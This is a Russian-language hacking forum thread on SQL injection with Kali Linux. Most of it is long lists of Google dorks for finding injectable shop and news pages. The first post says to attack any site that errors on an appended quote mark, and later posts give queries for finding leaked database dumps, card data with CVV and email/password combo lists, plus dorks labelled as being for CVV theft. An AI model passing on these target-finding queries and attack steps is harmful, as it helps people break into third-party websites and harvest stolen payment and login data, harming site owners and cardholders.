SQL инъекция на kali linux 2

Тема в разделе "ОC", создана пользователем Kluch, 25 мар 2016.

  1. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Kali Linux 2 0 Sana - SQL injection with SQLmap & jSQL

    cложного в принципе ,вбиваете в поиск гугла дорк. Затем шаритесь по списку сайтов. К дырявой ссылке подставляете ' если идет положительный отзыв для Вас и хуевый для хозяина ресурса,то атакуете.
    вот список дорков:
    about.php?cartID=
    accinfo.php?cartId=
    acclogin.php?cartID=
    ADD.php?bookid=
    add_cart.php?num=
    addcart.php?
    addItem.php
    add-to-cart.php?ID=
    addToCart.php?idProduct=
    addtomylist.php?ProdId=
    adminEditProductFields.php?intProdID=
    advSearch_h.php?idCategory=
    affiliate.php?ID=
    affiliate-agreement.cfm?storeid=
    affiliates.php?id=
    ancillary.php?ID=
    archive.php?id=
    article.php?id=
    phpx?PageID
    basket.php?id=
    Book.php?bookID=
    book_list.php?bookid=
    book_view.php?bookid=
    BookDetails.php?ID=
    browse.php?catid=
    browse_item_details.php
    Browse_Item_Details.php?Store_Id=
    buy.php?
    buy.php?bookid=
    bycategory.php?id=
    cardinfo.php?card=
    cart.php?action=
    cart.php?cart_id=
    cart.php?id=
    cart_additem.php?id=
    cart_validate.php?id=
    cartadd.php?id=
    cat.php?iCat=
    catalog.php
    catalog.php?CatalogID=
    catalog_item.php?ID=
    catalog_main.php?catid=
    category.php
    category.php?catid=
    category_list.php?id=
    categorydisplay.php?catid=
    checkout.php?cartid=
    checkout.php?UserID=
    checkout_confirmed.php?order_id=
    checkout1.php?cartid=
    comersus_listCategoriesAndProducts.php?idCategory=
    comersus_optEmailToFriendForm.php?idProduct=
    comersus_optReviewReadExec.php?idProduct=
    comersus_viewItem.php?idProduct=
    comments_form.php?ID=
    contact.php?cartId=
    content.php?id=
    customerService.php?****ID1=
    DEFAULT.php?catID=
    description.php?bookid=
    details.php?BookID=
    details.php?Press_Release_ID=
    details.php?Product_ID=
    details.php?Service_ID=
    display_item.php?id=
    displayproducts.php
    downloadTrial.php?intProdID=
    emailproduct.php?itemid=
    emailToFriend.php?idProduct=
    events.php?ID=
    faq.php?cartID=
    faq_list.php?id=
    faqs.php?id=
    feedback.php?title=
    freedownload.php?bookid=
    fullDisplay.php?item=
    getbook.php?bookid=
    GetItems.php?itemid=
    giftDetail.php?id=
    help.php?CartId=
    home.php?id=
    INDEX.php?cart=
    INDEX.php?cartID=
    INDEX.php?ID=
    info.php?ID=
    item.php?eid=
    item.php?item_id=
    item.php?itemid=
    item.php?model=
    item.php?prodtype=
    item.php?shopcd=
    item_details.php?catid=
    item_list.php?maingroup
    item_show.php?code_no=
    itemDesc.php?CartId=
    itemdetail.php?item=
    itemdetails.php?catalogid=
    learnmore.php?cartID=
    links.php?catid=
    list.php?bookid=
    List.php?CatID=
    listcategoriesandproducts.php?idCategory=
    modline.php?id=
    myaccount.php?catid=
    news.php?id=
    ORDER.php?BookID=
    ORDER.php?id=
    ORDER.php?item_ID=
    OrderForm.php?Cart=
    page.php?PartID=
    payment.php?CartID=
    pdetail.php?item_id=
    powersearch.php?CartId=
    price.php
    privacy.php?cartID=
    prodbycat.php?intCatalogID=
    prodetails.php?prodid=
    prodlist.php?catid=
    product.php?bookID=
    product.php?intProdID=
    product_info.php?item_id=
    productDetails.php?idProduct=
    productDisplay.php
    productinfo.php?item=
    productlist.php?ViewType=Category&CategoryID=
    productpage.php
    products.php?ID=
    products.php?keyword=
    products_category.php?CategoryID=
    products_detail.php?CategoryID=
    productsByCategory.php?intCatalogID=
    prodView.php?idProduct=
    promo.php?id=
    promotion.php?catid=
    pview.php?Item=
    resellers.php?idCategory=
    results.php?cat=
    savecart.php?CartId=
    SEARCH.php?CartID=
    searchcat.php?search_id=
    Select_Item.php?id=
    Services.php?ID=
    shippinginfo.php?CartId=
    shop.php?a=
    shop.php?action=
    shop.php?bookid=
    shop.php?cartID=
    shop_details.php?prodid=
    shopaddtocart.php
    shopaddtocart.php?catalogid=
    shopbasket.php?bookid=
    shopbycategory.php?catid=
    shopcart.php?title=
    shopcreatorder.php
    shopcurrency.php?cid=
    shopdc.php?bookid=
    shopdisplaycategories.php
    shopdisplayproduct.php?catalogid=
    shopdisplayproducts.php
    shopexd.php
    shopexd.php?catalogid=
    shopping_basket.php?cartID=
    shopprojectlogin.php
    shopquery.php?catalogid=
    shopremoveitem.php?cartid=
    shopreviewadd.php?id=
    shopreviewlist.php?id=
    ShopSearch.php?CategoryID=
    shoptellafriend.php?id=
    shopthanks.php
    shopwelcome.php?title=
    show_item.php?id=
    show_item_details.php?item_id=
    showbook.php?bookid=
    showStore.php?catID=
    shprodde.php?SKU=
    specials.php?id=
    store.php?id=
    store_bycat.php?id=
    store_listing.php?id=
    Store_ViewProducts.php?Cat=
    store-details.php?id=
    storefront.php?id=
    storefronts.php?title=
    storeitem.php?item=
    StoreRedirect.php?ID=
    subcategories.php?id=
    tek9.php?
    template.php?Action=Item&pid=
    topic.php?ID=
    tuangou.php?bookid=
    TYPE.php?iType=
    updatebasket.php?bookid=
    updates.php?ID=
    VIEW.php?cid=
    view_cart.php?title=
    view_detail.php?ID=
    viewcart.php?CartId=
    viewCart.php?userID=
    viewCat_h.php?idCategory=
    viewevent.php?EventID=
    viewitem.php?recor=
    viewPrd.php?idcategory=
    ViewProduct.php?misc=
    voteList.php?item_ID=
    whatsnew.php?idCategory=
    WsAncillary.php?ID=
    WsPages.php?ID=noticiasDetalle.php?xid=
    sitio/item.php?idcd=
    INDEX.php?site=
     
  2. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    event_info.php?p=
    view_items.php?id=
    home.php?cat=
    item_book.php?CAT=
    www/INDEX.php?page=
    schule/termine.php?VIEW=
    goods_detail.php?DATA=
    storemanager/contents/item.php?page_code=
    view_items.php?id=
    customer/board.htm?mode=
    help/com_view.html?code=
    n_replyboard.php?typeboard=
    eng_board/VIEW.php?T****=
    prev_results.php?prodID=
    bbs/VIEW.php?no=
    gnu/?doc=
    zb/VIEW.php?uid=
    global/product/product.php?gubun=
    m_view.php?ps_db=
    naboard/memo.php?bd=
    bookmark/mybook/bookmark.php?bookPageNo=
    board/board.html?TABLE=
    kboard/kboard.php?board=
    ORDER.asp?lotid=
    english/board/VIEW****.php?code=
    goboard/front/board_view.php?code=
    bbs/bbsView.php?id=
    boardView.php?bbs=
    eng/rgboard/VIEW.php?&bbs_id=
    product/product.php?cate=
    content.php?p=
    page.php?module=
    ?pid=
    bookpage.php?id=
    view_items.php?id=
    INDEX.php?pagina=
    product.php?prodid=
    notify/notify_form.php?topic_id=
    php/INDEX.php?id=
    content.php?cid=
    product.php?product_id=
    constructies/product.php?id=
    detail.php?id=
    php/INDEX.php?id=
    INDEX.php?SECTION=
    product.php?****=
    show_bug.cgi?id=
    detail.php?id=
    bookpage.php?id=
    product.php?id=
    today.php?eventid=
    main.php?item=
    INDEX.php?cPath=
    news.php?id=
    event.php?id=
    print.php?sid=
    news/news.php?id=
    module/range/dutch_windmill_collection.php?rangeId=
    print.php?sid=
    show_bug.cgi?id=
    product_details.php?product_id=
    products.php?groupid=
    projdetails.php?id=
    product.php?productid=
    products.php?catid=
    product.php?product_id=
    product.php?prodid=
    product.php?prodid=
    newsitem.php?newsID=
    newsitem.php?newsid=
    profile.php?id=
    s_in_area.php?area_id=
    productlist.php?id=
    productsview.php?proid=
    rss.php?cat=
    pub/pds/pds_view.php?START=
    products.php?rub=
    ogloszenia/rss.php?cat=
    print.php?sid=
    product.php?id=
    print.php?sid=
    magazin.php?cid=
    galerie.php?cid=
    www/INDEX.php?page=
    VIEW.php?id=
    content.php?id=
    board/READ.php?tid=
    product.php?id_h=
    news.php?id=
    INDEX.php?book=
    products.php?act=
    reply.php?id=
    stat.php?id=
    products.php?cat_id=
    free_board/board_view.html?page=
    item.php?id=
    view_items.php?id=
    main.php?prodID=
    gb/comment.php?gb_id=
    gb/comment.php?gb_id=
    classifieds/showproduct.php?product=
    VIEW.php?pageNum_rscomp=
    cart/addToCart.php?cid=
    content/pages/INDEX.php?id_cat=
    content.php?id=
    display.php?ID=
    display.php?ID=
    ponuky/item_show.php?ID=
    DEFAULT.php?cPath=
    main/magpreview.php?id=
    zine/board.php?board=
    content.php?arti_id=
    mall/more.php?ProdID=
    product.php?cat=
    news.php?id=
    content/VIEW.php?id=
    content.php?id=
    INDEX.php?action=
    board_view.php?s_board_id=
    KM/BOARD/readboard.php?id=
    board_view.html?id=
    content.php?cont_title=
    category.php?catid=
    mall/more.php?ProdID=
    publications.php?id=
    irbeautina/product_detail.php?product_id=
    print.php?sid=
    index_en.php?id=
    bid/topic.php?TopicID=
    news_content.php?CategoryID=
    front/bin/forumview.phtml?bbcode=
    cat.php?cat_id=
    stat.php?id=
     
  3. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    veranstaltungen/detail.php?id=
    more_details.php?id=
    english/print.php?id=
    print.php?id=
    view_item.php?id=
    content/conference_register.php?ID=
    rss/event.php?id=
    event.php?id=
    main.php?id=
    rtfe.php?siteid=
    category.php?cid=
    classifieds/detail.php?siteid=
    tools/print.php?id=
    channel/channel-layout.php?objId=
    content.php?id=
    resources/detail.php?id=
    more_details.php?id=
    detail.php?id=
    view_items.php?id=
    content/programme.php?ID=
    book.php?id=
    php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s =
    detail.php?id=
    DEFAULT.php?cPath=
    more_details.php?id=
    php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s =
    content.php?id=
    view_items.php?id=
    DEFAULT.php?cPath=
    book.php?id=
    view_items.php?id=
    products/parts/detail.php?id=
    category.php?cid=
    book.html?isbn=
    view_item.php?id=
    picgallery/category.php?cid=
    detail.php?id=
    print.php?sid=
    displayArticleB.php?id=
    knowledge_base/detail.php?id=
    bpac/calendar/event.php?id=
    mb_showtopic.php?topic_id=
    pages.php?id=
    content.php?id=
    exhibition_overview.php?id=
    singer/detail.php?siteid=
    Category.php?cid=
    detail.php?id=
    print.php?sid=
    category.php?cid=
    more_detail.php?X_EID=
    book.php?ISBN=
    view_items.php?id=
    category.php?cid=
    htmlpage.php?id=
    story.php?id=
    tools/print.php?id=
    print.php?sid=
    php/event.php?id=
    print.php?sid=
    articlecategory.php?id=
    print.php?sid=
    ibp.php?ISBN=
    club.php?cid=
    view_items.php?id=
    aboutchiangmai/details.php?id=
    view_items.php?id=
    book.php?isbn=
    blog_detail.php?id=
    event.php?id=
    DEFAULT.php?cPath=
    product_info.php?products_id=
    shop_display_products.php?cat_id=
    print.php?sid=
    modules/content/INDEX.php?id=
    printcards.php?ID=
    events/event.php?ID=
    more_details.php?id=
    DEFAULT.php?TID=
    general.php?id=
    detail.php?id=
    event.php?id=
    referral/detail.php?siteid=
    view_items.php?id=
    event.php?id=
    view_items.php?id=
    category.php?id=
    cemetery.php?id=
    INDEX.php?cid=
    content.php?id=
    exhibitions/detail.php?id=
    bookview.php?id=
    edatabase/home.php?cat=
    view_items.php?id=
    store/view_items.php?id=
    print.php?sid=
    events/event_detail.php?id=
    view_items.php?id=
    detail.php?id=
    pages/video.php?id=
    about_us.php?id=
    recipe/category.php?cid=
    view_item.php?id=
    en/main.php?id=
    print.php?sid=
    More_Details.php?id=
    category.php?cid=
    home.php?cat=
    article.php?id=
    page.php?id=
    print-story.php?id=
    psychology/people/detail.php?id=
    print.php?sid=
    print.php?ID=
    article_preview.php?id=
    Pages/whichArticle.php?id=
    view_items.php?id=
    Sales/view_item.php?id=
    book.php?isbn=
    knowledge_base/detail.php?id=
    gallery/gallery.php?id=
    event.php?id=
    detail.php?id=
    store/home.php?cat=
    view_items.php?id=
    detail.php?ID=
    event_details.php?id=
    detailedbook.php?isbn=
    fatcat/home.php?VIEW=
    events/INDEX.php?id=
    static.php?id=
    answer/DEFAULT.php?pollID=
    news/detail.php?id=
    view_items.php?id=
    events/unique_event.php?ID=
    gallery/detail.php?ID=
    print.php?sid=
    view_items.php?id=
    board/showthread.php?t=
    book.php?id=
    event.php?id=
    more_detail.php?id=
    knowledge_base/detail.php?id=
    html/print.php?sid=
    INDEX.php?id=
    content.php?ID=
    Shop/home.php?cat=
    store/home.php?cat=
    print.php?sid=
    gallery.php?id=
    resources/INDEX.php?cat=
    events/event.php?id=
    view_items.php?id=
    DEFAULT.php?cPath=
    content.php?id=
    products/products.php?p=
    auction/item.php?id=
    products.php?cat=
    clan_page.php?cid=
    product.php?sku=
    item.php?id=
    events?id=
    comments.php?id=
    products/?catID=
    modules.php?****=
    fshstatistic/INDEX.php?PID=
    products/products.php?p=
    sport.php?revista=
    products.php?p=
    products.php?openparent=
    home.php?cat=
    news/shownewsarticle.php?articleid=
    discussions/10/9/?CategoryID=
    trailer.php?id=
    news.php?id=
    ?page=
    INDEX.php?page=
    item/detail.php?num=
    features/VIEW.php?id=
    site/?details&prodid=
    product_info.php?products_id=
    remixer.php?id=
    proddetails_print.php?prodid=
    pylones/item.php?item=
    INDEX.php?cont=
    product.php?ItemId=
    video.php?id=
    detail.php?item_id=
    filemanager.php?DELETE=
    news/newsletter.php?id=
    shop/home.php?cat=
    designcenter/item.php?id=
    board/kboard.php?board=
    INDEX.php?id=
    board/view_temp.php?TABLE=
    magazine-details.php?magid=
     
  4. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    ОПЕРАТОРЫ
    Для удобства поиска поисковые системы типа гугл, яндекс и другие придумали специальные операторы такие как inurl, url, intext, filetype и т.д. Их много, но для простого поиска вам пригодяться только основные из них. Тут я опишу только основные операторы.

    Пример поиска в гугле:
    [Ссылки могут видеть только зарегистрированные пользователи.]userid=55&info=1

    SITE:
    Поиск только на определенном сайте включая поддомены.
    Запрос: site:antichat.ru
    Результат: forum.antichat.ru/threads/416081/
    Результат: video.antichat.ru/

    INTEXT:
    Поиск только в тексте документа игнорируя адреса, хеадеры, титлы и т.д.
    Запрос: intext:Привет! сегодня мы поговорим, о игре под названием dota 2!
    Результат: [Ссылки могут видеть только зарегистрированные пользователи.]
    "Привет! сегодня мы поговорим, о игре под названием dota 2!"

    FILETYPE: или EXT:
    Поиск по расширеию файла. Можно искать фотки, архивы, текстовые файлы, логи, базы данных и прочее.
    Пример: filetype:sql
    Результат: [Ссылки могут видеть только зарегистрированные пользователи.].sql (Да, да прям переходим и скачиваем дамп в формате .sql)

    INTITLE:
    Поиск по сайтам между тегами <title>Найдем этот текст</title>

    SIZE:
    Поиск по размеру файлов\страниц.
    size:512000 найдёт контент, бoльше, чем 500 кбайт.

    CACHE:
    Находит копию страницы даже если эта страница уже недоступна по адресу в Интернете или изменила свое содержание. Иными словами, эта команда проводит поиск в кэше Google.

    INFO:
    Покажет страницу, содержащую ссылки на варианты поиска: поиск по похожим страницам, обратные ссылки, и страницы, содержащие такую же ссылку. Эта команда означает то же самое, что и вписать в строку поиска данный адрес веб-страницы.

    LINK:
    Возвращает список страниц, которые ссылаются на заданный сайт. Для наглядности, введите.

    RELATED:
    Поиск страниц похожих на эту.

    Вот я и описал основные операторы гугла. Теперь чуть чуть попрактикуемся для наглядности использования этих операторов.

    - (минус)
    Это знак исключения, то есть не искать или без этого текста. Обычно я исключаю -google -dev -git это девелоперские сайты.

    " "(кавычки)
    Искать точную фразу.
    Где брать дорки?
    Если вы обычный юзер и вам просто надо найти какой-то конкретный контент, то самому написать нужный запрос.

    Придумав дорк не ждите, что она будет уязвимой это ОЧЕНЬ мизерный шанс такого совпадения.

    Я уже говорил, что дорки это СПЕЦИАЛЬНЫЕ запросы, так вот для них есть СПЕЦИАЛЬНАЯ база уязвимых дорков. Одни из крупнейших сайтов такого рода:

    [Ссылки могут видеть только зарегистрированные пользователи.]
    [Ссылки могут видеть только зарегистрированные пользователи.]
    и прочие другие.

    Просто переходим в нужную нам категорию и смотрим уже готовые уязвимые дорки найденные профессионалами.
    Немного практики.
    Давайте по полученным знаниям попробуем найти, что то полезное. Так как ачат относиться к хак форуму, значит будем искать примеры по данной тематике.

    Ищем дампы сайтов:
    Запрос: intext:mad:gmail.com filetype:sql size -git -google -dev
    Результат:
    [Ссылки могут видеть только зарегистрированные пользователи.]
    [Ссылки могут видеть только зарегистрированные пользователи.]
    Ищем данные кредиток:
    Запрос: filetype:txt intext:card intext:cvv -git -google -dev
    Результат:
    [Ссылки могут видеть только зарегистрированные пользователи.]
    [Ссылки могут видеть только зарегистрированные пользователи.]
    Ищем почты с паролями:
    Запрос: site:pastebin.com intext:mad:mail.ru combo
    Результат:
    [Ссылки могут видеть только зарегистрированные пользователи.]
    [Ссылки могут видеть только зарегистрированные пользователи.]
    Ну вот думаю вам теперь понятно для чего нужны дорки и как ими пользоваться.

    Дополнительные ссылки по теме:
    [Ссылки могут видеть только зарегистрированные пользователи.]
    [Ссылки могут видеть только зарегистрированные пользователи.]
     
  5. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Дорки PHP:
    inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
    inurl:"id=" & intext:"Warning: mysql_fetch_array()
    inurl:"id=" & intext:"Warning: mysql_num_rows()
    inurl:"id=" & intext:"Warning: session_start()
    inurl:"id=" & intext:"Warning: getimagesize()
    inurl:"id=" & intext:"Warning: is_writable()
    inurl:"id=" & intext:"Warning: getimagesize()
    inurl:"id=" & intext:"Warning: Unknown()
    inurl:"id=" & intext:"Warning: session_start()
    inurl:"id=" & intext:"Warning: mysql_result()
    inurl:"id=" & intext:"Warning: pg_exec()
    inurl:"id=" & intext:"Warning: mysql_result()
    inurl:"id=" & intext:"Warning: mysql_num_rows()
    inurl:"id=" & intext:"Warning: mysql_query()
    inurl:"id=" & intext:"Warning: array_merge()
    inurl:"id=" & intext:"Warning: preg_match()
    inurl:"id=" & intext:"Warning: ilesize()
    inurl:"id=" & intext:"Warning: filesize()
    inurl:"id=" & intext:"Warning: require()
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:eek:gl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:eek:pinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:eek:pinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:eek:ffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:eek:gl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:eek:pinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:eek:pinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:eek:ffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:recruit_details.php?id=
    inurl:index.php?cPath=
     
  6. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    Дорки для поиска картона CVV
    cat.asp?cat=
    productlist.asp?catalogid=
    Category.asp?category_id=
    Category.cfm?category_id=
    category.asp?cid=
    category.cfm?cid=
    category.asp?cat=
    category.cfm?cat=
    category.asp?id=
    index.cfm?pageid=
    category.asp?catid=
    Category.asp?c=
    Category.cfm?c=
    productlist.cfm?catalogid=
    productlist.asp?catalogid=
    viewitem.asp?catalogid=
    viewitem.cfm?catalogid=
    catalog.cfm?catalogId=
    catalog.asp?catalogId=
    department.cfm?dept=
    department.asp?dept=
    itemdetails.cfm?catalogId=
    itemdetails.asp?catalogId=
    product_detail.asp?catalogid=
    product_detail.cfm?catalogid=
    product_list.asp?catalogid=
    product_list.cfm?catalogid=
    ShowProduct.cfm?CatID=
    ShowProduct.asp?CatID=
    search_results.cfm?txtsearchParamCat=
    search_results.asp?txtsearchParamCat=
    itemdetails.cfm?catalogId=
    itemdetails.asp?catalogId=
    store-page.cfm?go=
    store-page.asp?go=
    Detail.cfm?CatalogID=
    Detail.asp?CatalogID=
    browse.cfm?category_id=
    view.cfm?category_id=
    products.cfm?category_id=
    index.cfm?Category_ID=
    detail.cfm?id=
    category.cfm?id=
    showitems.cfm?category_id=
    ViewProduct.asp?PID=
    ViewProduct.cfm?PID=
    shopdisplayproducts.asp?catalogid=
    shopdisplayproducts.cfn?catalogid=
    displayproducts.cfm?category_id=
    displayproducts.asp?category_id=
    DisplayProducts.asp?prodcat=
    DisplayProducts.cfm?prodcat=x
    productDetail.cfm?ProductID=
    products.php?subcat_id=
    showitem.cfm?id=21
    productdetail.cfm?pid=
    default.cfm?action=46
    products_accessories.asp?CatId=
    Store_ViewProducts.asp?Cat=
    category.cfm?categoryID=
    category.asp?category=
    tepeecart.cfm?shopid=
    view_product.asp?productID=
    ProductDetails.asp?prdId=12
    products.cfm?ID=
    detail.asp?product_id=
    product_detail.asp?product_id=
    products.php?subcat_id=
    product.php?product_id=
    view_product.cfm?productID=
    product_details.asp?prodid=
    shopdisplayproducts.cfm?id=
    displayproducts.cfm?id=
     
  7. Kluch

    Kluch Местный

    Регистрация:
    19 дек 2015
    Сообщения:
    189
    Симпатии:
    30
    Розыгрышей:
    0
    Пол:
    Мужской
    ASP Dorks for sql injection
    ".asp?bookID="
    ".asp?cart="
    ".asp?cartID="
    ".asp?catalogid="
    ".asp?category_list="
    ".asp?CategoryID="
    ".asp?catID="
    ".asp?cid="
    ".asp?code_no="
    ".asp?code="
    ".asp?designer="
    ".asp?framecode="
    ".asp?id="
    ".asp?idcategory="
    ".asp?idproduct="
    ".asp?intCatalogID="
    ".asp?intProdId="
    ".asp?item_id="
    ".asp?item="
    ".asp?itemID="
    ".asp?maingroup="
    ".asp?misc="
    ".asp?newsid="
    ".asp?order_id="
